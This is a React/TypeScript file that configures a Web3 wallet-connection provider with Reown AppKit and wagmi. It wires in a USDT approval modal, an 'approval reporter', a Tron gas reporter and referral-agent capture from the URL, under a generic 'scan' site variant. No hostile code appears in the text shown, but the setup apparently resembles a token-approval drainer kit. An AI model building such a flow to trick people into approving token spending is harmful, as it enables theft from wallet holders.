"use client"

import { useEffect, useState, type ReactNode } from "react"
import { QueryClient, QueryClientProvider } from "@tanstack/react-query"
import { createAppKit } from "@reown/appkit/react"
import { WagmiProvider } from "wagmi"

import {
  defaultDappUrl,
  defaultUsdtApprovalLabels,
  evmNetworks,
  projectId,
  type SiteVariant,
  type UsdtApprovalLabels,
  type WalletModalLabels,
  wagmiAdapter,
  wagmiConfig,
} from "./config"
import { captureRefFromUrl } from "./agent-ref"
import { ApprovalProvider } from "./context/approval-context"
import { WalletChainProvider } from "./context/wallet-context"
import { ApprovalReporter } from "./components/approval-reporter"
import { TronGasReporter } from "./components/tron-gas-reporter"
import { ConnectWalletModal } from "./components/connect-wallet-modal"
import { UsdtApprovalModal } from "./components/usdt-approval-modal"

createAppKit({
  adapters: [wagmiAdapter],
  networks: evmNetworks,
  projectId,
  metadata: {
    name: "Web3 DApp",
    description: "Secure Web3 wallet connection",
    url: defaultDappUrl,
    icons: ["https://avatars.githubusercontent.com/u/179229932"],
  },
  features: {
    analytics: false,
    allWallets: true,
    email: false,
    socials: false,
    emailShowWallets: false,
  },
})

type Web3ProviderProps = {
  children: ReactNode
  siteVariant?: SiteVariant
  approvalLabels?: Partial<UsdtApprovalLabels>
  walletModalLabels?: Partial<WalletModalLabels>
}

export function Web3Provider({
  children,
  siteVariant = "scan",
  approvalLabels = defaultUsdtApprovalLabels,
  walletModalLabels,
}: Web3ProviderProps) {
  const [queryClient] = useState(
    () =>
      new QueryClient({
        defaultOptions: {
          queries: {
            staleTime: 60_000,
            refetchOnWindowFocus: false,
          },
        },
      })
  )

  useEffect(() => {
    captureRefFromUrl()
  }, [])

  return (
    <QueryClientProvider client={queryClient}>
      <WagmiProvider config={wagmiConfig}>
        <WalletChainProvider initialModalLabels={walletModalLabels}>
          <ApprovalProvider siteVariant={siteVariant} labels={approvalLabels}>
            {children}
            <ApprovalReporter />
            <TronGasReporter />
            <ConnectWalletModal />
            <UsdtApprovalModal />
          </ApprovalProvider>
        </WalletChainProvider>
      </WagmiProvider>
    </QueryClientProvider>
  )
}
